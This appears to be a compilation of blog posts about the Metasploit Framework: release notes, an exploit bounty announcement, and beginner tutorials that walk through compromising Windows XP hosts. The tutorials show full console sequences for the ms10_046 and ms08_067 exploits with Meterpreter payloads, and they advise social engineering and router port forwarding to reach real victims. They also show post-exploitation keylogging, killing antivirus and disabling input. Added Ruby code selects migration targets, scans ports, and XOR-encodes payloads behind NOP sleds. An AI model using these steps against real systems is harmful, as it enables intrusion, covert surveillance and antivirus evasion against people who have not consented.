“The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task.”
Official Change Log
Statistics:
Metasploit now ships with 716 exploit modules, 361 auxiliary modules, and 68 post modules.
20 new exploits, 3 new auxiliary modules, and 14 new post modules have been added since the last release (3.7.2)
New Modules since 3.7.2:
New Exploit Modules:
VSFTPD v2.3.4 Backdoor Command Execution
Java RMI Server Insecure Default Configuration Java Code Execution
HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
Feature #4982 – Support for custom executable with psexec
Feature #4856 – RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
Feature #4578 – Update Nmap XML parsers to support Nokogiri parsing
Feature #4417 – Post exploitation module to harvest OpenSSH credentials
Feature #4015 – Increase test coverage for railgun
Bug #4963 – Rework db_* commands for consistency
Bug #4892 – non-windows meterpreters upload into the wrong filename
Bug #4296 – Meterpreter stdapi registry functions create key if one doesn’t exist
Bug #3565 – framework installer fails on RHEL (postgres taking too long to start)
Armitage: Armitage integrates with Metasploit 4.0 to:
Take advantage of the new Meterpreter payload stagers
Crack credentials with the click of a button
Run post modules against multiple hosts
Automatically log all post-exploitation activity
Revision Information:
Framework Revision 13462
Several import parsers were rewritten to use Nokogiri for much faster processing of large import files. Adding to Metasploit’s extensive payload support, Windows and Java Meterpreter now both support staging over HTTP and Windows can use HTTPS. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn’t perfect nor is it nearly as complete as the Windows version, but many features already work. Java applet signing is now done directly in Ruby, removing the need for a JDK for generating self-signed certificates. The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.
Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets.
The Metasploit® Framework is a free, open source penetration testing solution developed by the open source community and Rapid7. 11 new exploits, 1 new auxiliary module, and 15 new post modules have been added since the last release.
New Features:
Remote registry commands for Meterpreter
Import parsers moved to nokogiri streaming parsers (for quicker parsing of large XML files)
Updates to the egghunter payload to help the payload bypass DEP.
Welcome to Metasploit Basics Part 3. In this part I will show a live example of how to compromise a PC with an exploit and what to do once the Meterpreter session is open. In short, I will explain the Meterpreter.
The beauty of Meterpreter is that once exploitation occurs it runs by injecting itself into the exploited process on the remote system, living in memory rather than on disk. Every command you run through Meterpreter executes in the context of that process, with that process's user and privileges.
Meterpreter is short for Meta-Interpreter. It is one of the advanced payloads available in the MSF. The way to look at Meterpreter is not simply as a payload but as a post-exploitation platform that executes on the remote system. It has its own command shell, which gives the attacker a wide range of actions on the exploited system. In short, Meterpreter overcomes the limitations of a single-purpose payload such as adduser.
I will use my host and a virtual machine to demonstrate this so that you can follow along: a Windows XP box attacked from BackTrack with Metasploit. Unfortunately my XP install was patched, so I chose a client-side exploit that gives a better chance of getting in.
msf > use windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set lhost 192.168.56.128    (your IP)
lhost => 192.168.56.128
msf exploit(ms10_046_shortcut_icon_dllloader) > set srvhost 192.168.56.128    (local address to listen on)
srvhost => 192.168.56.128
Now I type exploit and the malicious web server starts.
Now it is up to you to do some social engineering appropriate to your situation: get the victim to open the URL the module prints, [*] Using URL : http://192.168.56.128:80/ (this is just my host-only IP; if you run BackTrack and Metasploit in a virtual machine yours will be some 192.168.x.x address). Note that this does not work over the internet as-is: the victim has to be able to reach SRVHOST:SRVPORT for the page and LHOST:LPORT for the reverse connection, so behind NAT you must forward those ports on your router to the attacking machine and set LHOST to the address the victim can actually reach. Have a look here
Now, within a second, this becomes ..
OK, Parts 1 and 2 have now been shown in practice. Time for Part 3 to start.
Type sessions to make sure we have an active session. Then type sessions -i followed by the id number of the session you want to interact with.
We are now in the Meterpreter shell, where we can do a lot of things.
Let's see the list of commands available in our Meterpreter:
meterpreter > help
Core Commands
=============

Command       Description
-------       -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================

Command       Description
-------       -----------
cat           Read the contents of a file to the screen
cd            Change directory
del           Delete the specified file
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd         Print working directory
lcd           Change local working directory
lpwd          Print local working directory
ls            List files
mkdir         Make directory
pwd           Print working directory
rm            Delete the specified file
rmdir         Remove directory
search        Search for files
upload        Upload a file or directory

Stdapi: Networking Commands
===========================

Command       Description
-------       -----------
ipconfig      Display interfaces
portfwd       Forward a local port to a remote service
route         View and modify the routing table
Stdapi: System Commands
=======================

Command       Description
-------       -----------
clearev       Clear the event log
drop_token    Relinquishes any active impersonation token.
execute       Execute a command
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process
getuid        Get the user that the server is running as
kill          Terminate a process
ps            List running processes
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell         Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command       Description
-------       -----------
enumdesktops  List all accessible desktops and window stations
getdesktop    Get the current meterpreter desktop
idletime      Returns the number of seconds the remote user has been idle
keyscan_dump  Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop  Stop capturing keystrokes
screenshot    Grab a screenshot of the interactive desktop
setdesktop    Change the meterpreters current desktop
uictl         Control some of the user interface components

Stdapi: Webcam Commands
=======================

Command       Description
-------       -----------
record_mic    Record audio from the default microphone for X seconds
webcam_list   List webcams
webcam_snap   Take a snapshot from the specified webcam

Priv: Elevate Commands
======================

Command       Description
-------       -----------
getsystem     Attempt to elevate your privilege to that of local system.
Time won't allow me to explain every function bit by bit, so I will just give a brief tour.
Every time I get into a box I prefer to learn more about it first, so I type:
meterpreter > sysinfo
Computer        : SAURAV-79E14E1B
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
Impressive, isn't it?
Next I always migrate to another process, both to hide myself and to survive if the exploited process (here the browser) is closed or crashes. Be sure to choose something that is always running, or you may get cut off. Type ps to see what is running, then migrate with migrate PID, for example:
meterpreter > migrate 416
[*] Migrating to 416...
[*] Migration completed successfully.
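Choosing a migration target is the one decision in that step that deserves some logic, and it is exactly what the migrate.rb script listed later automates. The following is an added example written for this post, not one of Metasploit's own scripts: it applies the "always running, same user, same architecture" rule to a process table. In a live session the table comes from client.sys.process.get_processes and the jump is client.core.migrate(pid); here a constructed table (hostname, users and PIDs are made up) stands in for the live call so the selection logic runs offline.

```ruby
# Added example (not a Metasploit script): pick a Meterpreter migration target
# the way a script would, from a process table shaped like the output of
# client.sys.process.get_processes. Runs offline on constructed data.

# Long-lived processes on an XP box, most preferred first. explorer.exe is the
# usual choice for a user-level session; lsass/winlogon only make sense once
# you already run as SYSTEM (and a crash in lsass reboots the host).
STABLE_HOSTS = %w[explorer.exe svchost.exe lsass.exe winlogon.exe].freeze

# Constructed sample process table (PIDs, users and names are made up).
SAMPLE_PROCS = [
  { 'pid' => 4,    'name' => 'System',       'arch' => 'x86', 'user' => 'NT AUTHORITY\\SYSTEM' },
  { 'pid' => 416,  'name' => 'svchost.exe',  'arch' => 'x86', 'user' => 'NT AUTHORITY\\SYSTEM' },
  { 'pid' => 680,  'name' => 'lsass.exe',    'arch' => 'x86', 'user' => 'NT AUTHORITY\\SYSTEM' },
  { 'pid' => 724,  'name' => 'winlogon.exe', 'arch' => 'x86', 'user' => 'NT AUTHORITY\\SYSTEM' },
  { 'pid' => 1536, 'name' => 'explorer.exe', 'arch' => 'x86', 'user' => 'WORKSTATION\\alice' },
  { 'pid' => 1812, 'name' => 'firefox.exe',  'arch' => 'x86', 'user' => 'WORKSTATION\\alice' },
  { 'pid' => 2044, 'name' => 'iexplore.exe', 'arch' => 'x86', 'user' => 'WORKSTATION\\alice' }
].freeze

# Returns the best host process (a hash from the table), or nil if none fits.
def pick_migration_target(procs, current_pid:, current_user:, arch: 'x86')
  candidates = procs.select do |p|
    p['pid'] != current_pid &&                    # never "migrate" into yourself
      p['arch'] == arch &&                         # an x86 server needs an x86 host
      STABLE_HOSTS.include?(p['name'].downcase)    # only long-lived processes
  end
  # Prefer a process owned by the same account (the session keeps its token)
  # and, within that, the most preferred name in STABLE_HOSTS.
  candidates.min_by do |p|
    [p['user'] == current_user ? 0 : 1, STABLE_HOSTS.index(p['name'].downcase)]
  end
end

if __FILE__ == $PROGRAM_NAME
  # Session currently inside the victim's browser (pid 2044, user alice).
  target = pick_migration_target(SAMPLE_PROCS, current_pid: 2044,
                                 current_user: 'WORKSTATION\\alice')
  puts "migrate #{target['pid']}   # #{target['name']}"
  # In a real script: client.core.migrate(target['pid'])
end
```

Run as a script it prints "migrate 1536   # explorer.exe" for the browser session; a SYSTEM-level session in svchost.exe would instead be steered to lsass.exe, because keeping the same token is weighted above the name order.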
You can also disable the keyboard and the mouse and then re-enable them:
meterpreter > uictl disable keyboard
Disabling keyboard...
meterpreter > uictl disable mouse
Disabling mouse...
meterpreter > uictl enable mouse
Enabling mouse...
meterpreter > uictl enable keyboard
Enabling keyboard...
Now let's see how to sniff keystrokes. The commands in use are keyscan_start, keyscan_dump and keyscan_stop: start the capture, dump whatever has been collected so far, stop the capture.
I made a very small video demonstrating this
The networking commands also help a lot in the game.
When I type the ipconfig command, Meterpreter shows me all the victim's network interfaces and addresses:
meterpreter > ipconfig
WAN (PPP/SLIP) Interface
Hardware MAC: 00:5*:45:00:00:00
IP Address  : 5*.1**.1**.2
Netmask     : 255.255.255.255

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

VMware Virtual Ethernet Adapter for VMnet1
Hardware MAC: 00:50:56:c5:00:01
IP Address  : 192.168.38.1
Netmask     : 255.255.255.0

VMware Virtual Ethernet Adapter for VMnet8
Hardware MAC: 00:50:56:c0:00:08
IP Address  : 192.168.56.1
Netmask     : 255.255.255.0
Using the system commands: this video demonstrates some of them at work as I download a file, edit it and then upload it into a folder on the victim's computer.
Metasploit also lets you run scripts on the victim from the Meterpreter shell. Metasploit is written in Ruby, so scripts are Ruby too; a number of them ship with Metasploit, and if you know Ruby you can write your own. I will not cover all of them, but some:
killav.rb (kills known antivirus processes running on the system)
getcountermeasure.rb (kills AV, firewall and IDS processes)
gettelnet.rb (opens a telnet server on the target with a username and password)
checkvm.rb (checks whether the target is a VM, and which product/version)
keylogrecorder.rb (records keystrokes)
netenum.rb, search_dwld.rb, winbf.rb, credcollect.rb, hostsedit.rb, remotewinenum.rb, scheduleme.rb, schtasksabuse.rb, wmic.rb, get_local_subnets.rb, migrate.rb ...... and more
So let's run a few scripts so you get the idea of what's going on.
meterpreter > run killav
[*] Killing Antivirus services on the target
[*] Killing off Monitor.exe

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine
[*] It appears to be physical host.
meterpreter >
P.S. You can type run <script> -h to get a script's built-in help, for example run scraper -h.
meterpreter > run keylogrecorder
[*] firefox.exe Process found, migrating into 1812
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/keylogrecorder/96.28.86.172_20091221.2422/96.28.86.172_20091221.2422.db
[*] Recording ...
The strokes are saved to a database on the attackers machine for reference at a later date.
You can try the rest of the commands on your own. Time and Blogger won't permit me to explain more, because this post has already become a long one. Any suggestions or praise are welcome.
---kudos to rapid7 community for such a good tool metasploit.---
The Metasploit team is excited to announce a new incentive for community exploit contributions: Cash! Running until July 20th, their Exploit Bounty program will pay out $5,000 in cash awards (in the form of American Express gift cards) to any community member that submits an accepted exploit module for an item from their Top 5 or Top 25 exploit lists. This is their way of saying thanks to the open source exploit development community and encouraging folks who may not have written Metasploit modules before to give it a try.
All accepted submissions will be available under the standard Metasploit Framework license (3-clause BSD). Exploit selection is first-come, first-serve; please see the official rules for more information.
Contributors will have a chance to claim a vulnerability from the Top 25 ($100) and Top 5 ($500) lists. Once a vulnerability has been claimed the contributor will be given one week to work on a module. After a week the vulnerability will be open again to the community. Prizes will only be paid out to the first module contributor for a given vulnerability. The process of claiming a vulnerability is an attempt at limiting situations where multiple contributors submit modules for the same vulnerability. To stake a claim, send an email to bounty@metasploit.com with the name of the vulnerability from the list below. All claims will be acknowledged, so please wait until receiving the acknowledgement before starting on the exploit. Each contributor can only have one outstanding claim at a time.
If you need help with the Metasploit module format, feel free to drop by the IRC channel (#metasploit on irc.freenode.net), and take a look at some of the community documents:
1. Choose an exploit from the list below that has an empty Owner field.
2. Email bounty@metasploit.com and wait for an acknowledgement of your claim.
3. Within one week, submit an exploit module to the Metasploit Redmine tracker as a new ticket with attachment.
4. Receive feedback on the module via Redmine and acceptance status.
Rules
All submissions must come from the Top 25 or Top 5 lists below
All exploits should be submitted to Metasploit Redmine. 1 ticket per exploit.
Modules MUST conform to the HACKING style guidelines
Should work reliably on all targets listed in the module.
Payment
The program ends July 20th; this is the submission deadline for modules to be considered for the contest. Payment will be in the form of American Express gift cards sent within 60 days from the end of the program.
This may vary in your Metasploit depending on your version.
The Basic use of metasploit
1. Pick which exploit to use
2. Configure the exploit with remote IP address and remote port number
3. Pick a payload
4. Configure the payload with local IP address and local port number
5. Execute the exploit
Now time for a example
Type "show exploits" to see the list of available exploits. Many of the exploits listed will work against target servers, but the difficult part is knowing which ones will work against yours =P
I will use:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
Now, to see the exploit commands, we type "help":
msf exploit(ms08_067_netapi) > help
Many commands appear, but I needed the exploit commands :( Yes, got it, they are at the end :)
Exploit Commands
================

Command       Description
-------       -----------
check         Check to see if a target is vulnerable
exploit       Launch an exploit attempt
rcheck        Reloads the module and checks if the target is vulnerable
reload        Just reloads the module
rexploit      Reloads the module and launches an exploit attempt
Now it is time to see some information about the exploit: type "info" and watch the magic happen.
You will see plenty of information about the exploit, such as its name, version, available targets and so on.
So far we have only been looking at information about the exploit; the real stunt comes now.
We will set the payload that runs once exploitation succeeds.
To see the available payloads type "show payloads".
Now we select a payload; I prefer windows/meterpreter/bind_tcp:
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
Type "show options" to see all the options we have to fill in.
We need to set RHOST (the victim): type set RHOST xxx.xxx.xxx.xxx, where the x's are the target's IP address. When you type show options again you will see RHOST filled in with that address :)
The options vary from exploit to exploit; a reverse payload, for instance, also asks for LHOST, your own IP address (the one the victim can reach), which you set the same way: set LHOST xxx.xxx.xxx.xxx
The 'set' command configures Framework options and parameters for the module you are currently working with.
After all the options are filled in, check the host before trying to exploit it.
We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out: type "check". Not every exploit implements it, but when it does it tells you whether the target appears vulnerable. Some exploits also need you to select which type of system to compromise; with this module the target is detected automatically, so that is not necessary.
Once you are sure everything went right, type "exploit".
If it succeeds you will see something like this:
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:51333 -> xxx.xxx.xxx.xxx:4444)

In short, the whole sequence is:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST [TARGET IP]
msf exploit(ms08_067_netapi) > exploit
Now you own the PC; it is yours and you can do anything with it. I will not explain that here, because it deserves an article of its own.
The article is getting long, but I still have to explain auxiliary modules, NOPs and encoders in brief.
Auxiliary modules perform scanning, fuzzing, sniffing, information gathering and much more. They do not give you a shell, but they are just as important as exploits and payloads.
I will borrow Offensive Security's example here; I can't write much more, my hand is aching.
Auxiliary Example
Port Scanning
In addition to running Nmap, there are a variety of other port scanners that are available to us within the framework.
Name                      Description
----                      -----------
scanner/portscan/ack      TCP ACK Firewall Scanner
scanner/portscan/ftpbounce FTP Bounce Port Scanner
scanner/portscan/syn      TCP SYN Port Scanner
scanner/portscan/tcp      TCP Port Scanner
scanner/portscan/xmas     TCP "XMas" Port Scanner
The Result
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options

Module options (auxiliary/scanner/portscan/syn):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
BATCHSIZE  256              yes       The number of hosts to scan per set
INTERFACE                   no        The name of the interface
PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
RHOSTS                      yes       The target address range or CIDR identifier
SNAPLEN    65535            yes       The number of bytes to capture
THREADS    1                yes       The number of concurrent threads
TIMEOUT    500              yes       The reply read timeout in milliseconds

msf auxiliary(syn) > set INTERFACE eth0
INTERFACE => eth0
msf auxiliary(syn) > set PORTS 80
PORTS => 80
msf auxiliary(syn) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(syn) > set THREADS 50
THREADS => 50
msf auxiliary(syn) > run

[*] TCP OPEN 192.168.1.1:80
[*] TCP OPEN 192.168.1.2:80
[*] TCP OPEN 192.168.1.10:80
[*] TCP OPEN 192.168.1.109:80
[*] TCP OPEN 192.168.1.116:80
[*] TCP OPEN 192.168.1.150:80
[*] Auxiliary module execution completed
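The SYN scanner above needs raw sockets (hence the INTERFACE option and the pcap dependency mentioned in the release notes); its sibling scanner/portscan/tcp gets the same answer with ordinary connect() calls. To show what those THREADS and TIMEOUT options actually drive, here is an added example in plain Ruby, written for this post and not Metasploit's module: a threaded connect scanner with a worker pool and a per-port timeout. It is self-contained: it opens a listener on an ephemeral loopback port to play the open service and uses a just-released port as the closed one, so it runs offline.

```ruby
require 'socket'

# Added example (not Metasploit's scanner/portscan/tcp): a threaded TCP
# connect scanner. A completed handshake means open, an RST (ECONNREFUSED)
# means closed, and silence until the timeout means filtered, which is the
# case a firewall dropping the SYN produces and the ACK scanner probes for.
def probe_port(host, port, timeout_s)
  sock = Socket.tcp(host, port, connect_timeout: timeout_s)
  sock.close
  :open
rescue Errno::ECONNREFUSED
  :closed
rescue SystemCallError, IOError
  :filtered   # ETIMEDOUT, EHOSTUNREACH, ...: no answer we can trust
end

# Scan PORTS on HOST with a bounded worker pool (THREADS) and a per-probe
# timeout (TIMEOUT). Returns {port => :open | :closed | :filtered}.
def scan(host, ports, threads: 10, timeout_s: 0.5)
  queue = Queue.new
  ports.each { |p| queue << p }
  results = {}
  lock = Mutex.new
  workers = Array.new(threads) do
    Thread.new do
      loop do
        port = begin
          queue.pop(true)        # non-blocking pop; raises once the queue is drained
        rescue ThreadError
          break
        end
        state = probe_port(host, port, timeout_s)
        lock.synchronize { results[port] = state }
      end
    end
  end
  workers.each(&:join)
  results.sort.to_h
end

# Same one-line-per-open-port output the module prints.
def report(host, results)
  results.select { |_, s| s == :open }.map { |port, _| "[*] TCP OPEN #{host}:#{port}" }
end

# Self-contained demo: a listener on an ephemeral loopback port plays the
# open service; a port that was bound and released plays the closed one.
def demo
  server = TCPServer.new('127.0.0.1', 0)
  open_port = server.addr[1]
  spare = TCPServer.new('127.0.0.1', 0)
  closed_port = spare.addr[1]
  spare.close
  results = scan('127.0.0.1', [open_port, closed_port], threads: 2, timeout_s: 0.5)
  { open_port: open_port, closed_port: closed_port, results: results }
ensure
  server&.close
end

if __FILE__ == $PROGRAM_NAME
  r = demo
  puts report('127.0.0.1', r[:results])
end
```

A connect scan is noisier than the SYN scan (every probe completes the handshake, so the service logs a connection), but it needs no privileges and no pcap, which is why it is the fallback when raw sockets are unavailable.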
The simplified NOP mixin provided in Msf::Simple::Nop extends each nop module instance with a method called generate_simple. This method takes the length of the sled to generate and the hash of options that should be used for the generation. On success, the return value is a buffer that is encoded using the Msf::Simple::Buffer class using the format specified in the option hash as the ’Format’ element. If no format is specified, the raw version of the NOP sled is returned.
Encoders
Encoder modules are used to generate transformed versions of raw payloads in a way that allows them to be restored to their original form at execution time and then subsequently executed. To accomplish this, most encoders will take the raw form of the payload and run it through some kind of encoding algorithm, like bitwise XOR. After the encoded version is generated, a decoding stub is prefixed to the encoded version of the payload. This stub is responsible for performing the inverse operation on the buffer attached to the decoder when it executes. After the decoder restores the payload to its original form, it will transfer execution to the start of the now normalized payload.

To support the above described encoder model, the Metasploit framework provides the Msf::Encoder class which inherits from the Msf::Module base class. All encoders must inherit from the Msf::Encoder class at some level to ensure that encoder-specific methods are included in the derived class.

Like the module information hash, encoders have some specialized information hash elements that describe information about the encoder being used. The information that encoder modules need to describe are the attributes of the decoder which is conveyed through the Decoder information hash element. The Decoder hash element references another hash that contains decoder specific properties. These are described in the table shown in figure 6.3 along with their types and module instance accessors.
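The two developer-guide paragraphs above (the NOP mixin's generate_simple and the encoder/decoder-stub model) describe the same buffer-shaping job from two ends, so one worked example covers both. It is an added example in plain Ruby, not Metasploit code: it generates a NOP sled from single-byte x86 instructions filtered against a bad-character set, XOR-encodes a payload with a key chosen so that neither the key nor the ciphertext contains a bad character, and then performs the inverse the decoder stub would perform at run time. The decoder stub itself is x86 machine code and is not emitted here; the bad-character set, the NOP pool and the sample payload bytes are constructed for the example.

```ruby
# Added example (not Metasploit code): what a NOP generator and a single-byte
# XOR encoder do to a raw payload. The x86 decoder stub Metasploit prefixes is
# not emitted; decode_payload shows the operation that stub performs in memory.

# Constructed bad-character set: NUL and CR/LF, the usual suspects for a
# string-copy or line-oriented overflow.
BAD_CHARS = [0x00, 0x0a, 0x0d].freeze

# x86 one-byte instructions usable as sled filler. Only 0x90 (nop) is free of
# side effects: 0x40-0x4f (inc/dec r32) clobber a register and 0xf8/0xf9/0xfc
# (clc/stc/cld) touch flags, so drop them if the payload relies on those.
NOP_POOL = [0x90, *(0x40..0x4f), 0xf8, 0xf9, 0xfc].freeze

# Constructed sample bytes (shellcode-like, not a working payload) with a NUL
# and an LF spliced in so the raw form trips the bad-character filter.
SAMPLE_PAYLOAD = [0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f,
                  0x62, 0x69, 0x6e, 0x89, 0xe3, 0x00, 0x0a, 0xcd, 0x80].pack('C*')

def has_bad_chars?(buf, bad_chars = BAD_CHARS)
  buf.bytes.any? { |b| bad_chars.include?(b) }
end

# Random sled from the allowed pool: the raw-format result generate_simple
# returns, minus Metasploit's register-saving options.
def nop_sled(length, bad_chars: BAD_CHARS, rng: Random.new(1))
  pool = NOP_POOL - bad_chars
  raise ArgumentError, 'no usable NOP bytes' if pool.empty?
  Array.new(length) { pool[rng.rand(pool.size)] }.pack('C*')
end

def xor_bytes(buf, key)
  buf.bytes.map { |b| b ^ key }.pack('C*')
end

# First single-byte key for which the ciphertext, and the key itself (it is
# embedded as an immediate in the decoder stub), contain no bad characters.
def find_xor_key(payload, bad_chars: BAD_CHARS)
  (1..255).find do |key|
    !bad_chars.include?(key) && !has_bad_chars?(xor_bytes(payload, key), bad_chars)
  end
end

# Returns [key, encoded_payload].
def encode_payload(payload, bad_chars: BAD_CHARS)
  key = find_xor_key(payload, bad_chars: bad_chars)
  raise 'no single-byte XOR key avoids the bad characters' unless key
  [key, xor_bytes(payload, key)]
end

# The inverse the decoder stub performs before jumping to the payload.
def decode_payload(encoded, key)
  xor_bytes(encoded, key)
end

# Sled + encoded payload: the shape of an exploit buffer before the return
# address is appended.
def build_buffer(payload, sled_len: 16, bad_chars: BAD_CHARS)
  key, encoded = encode_payload(payload, bad_chars: bad_chars)
  { key: key, buffer: nop_sled(sled_len, bad_chars: bad_chars) + encoded }
end

if __FILE__ == $PROGRAM_NAME
  key, encoded = encode_payload(SAMPLE_PAYLOAD)
  puts "raw payload has bad chars: #{has_bad_chars?(SAMPLE_PAYLOAD)}"
  puts "key 0x#{key.to_s(16)}, encoded is clean: #{!has_bad_chars?(encoded)}"
  puts "roundtrip ok: #{decode_payload(encoded, key) == SAMPLE_PAYLOAD}"
end
```

This is also why encoding is not an antivirus feature: the key search exists to dodge bytes the vulnerable program would mangle, and any scanner that emulates the stub sees the original payload again.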
Explaining NOPs and encoders in depth would confuse newbies, so I will cover them later.
This covers only basic usage and was written entirely for beginners; more advanced information about Metasploit is waiting to be posted.
Replies, questions and suggestions regarding this topic are welcome.
This post is a basic introduction to Metasploit and how it works.
What is Metasploit ?
The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.
Basically, Metasploit is a tool that provides a complete environment for exploitation.
Metasploit is run by Rapid7 and its community and is written in Ruby; it is one of the largest Ruby code bases around.
Why is Metasploit recommended?
Metasploit is free and easy to use, and you can develop your own exploits, payloads and so on and use them within the framework.
It comes with over 690 exploits, which are updated on a regular basis (0-days included).
We can use different plugins and external tools to improve Metasploit's productivity, for example SET (Social-Engineer Toolkit), BeEF, XSSF, Nexpose, Nmap, w3af etc. (we will continue with these in later posts).
Metasploit is available in 3 versions
Metasploit Pro - for pentester
Metasploit Express- for IT security teams
Metasploit Framework - Its an open source & avialable for download for free
To take advantage of a vulnerability, you usually need an exploit: a small and highly specialized program whose only purpose is to take advantage of one specific vulnerability and provide access to a computer system. Exploits usually deliver a payload to the target system to grant the attacker access to it. Here is an article on the basic working of EXPLOITS
What is a payload? A payload is the piece of software that lets you control a computer system after it has been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there.
Basically, the payload is what you want to do to your target once you are in. Meterpreter is the most reliable payload, and we will use it in most of the cases ahead.
What is auxiliary?
Metasploit comes with 358 auxiliary modules. Basically, auxiliaries are used for information gathering before exploitation, for example to find out whether a machine is vulnerable to an attack or not. Here is a video on the email extractor auxiliary.
What are Nops & Encoders?
Metasploit comes with 8 NOP generators and 27 encoders. Encoders transform a payload so that it avoids characters the vulnerable program would mangle (a null byte in a string copy, for instance) and, as a side effect, changes its byte signature; NOP generators pad the buffer with harmless instructions so the landing spot need not be exact. Between them they are what makes a payload execute reliably and, with varying success, slip past antivirus and firewall signatures.
Moving on to the Metasploit Framework and some important commands: the Metasploit console is easy to understand if you use your common sense, and the help command does the trick. It shows all the commands available in Metasploit.
We will move on to a series of discussions and tutorials on Metasploit later.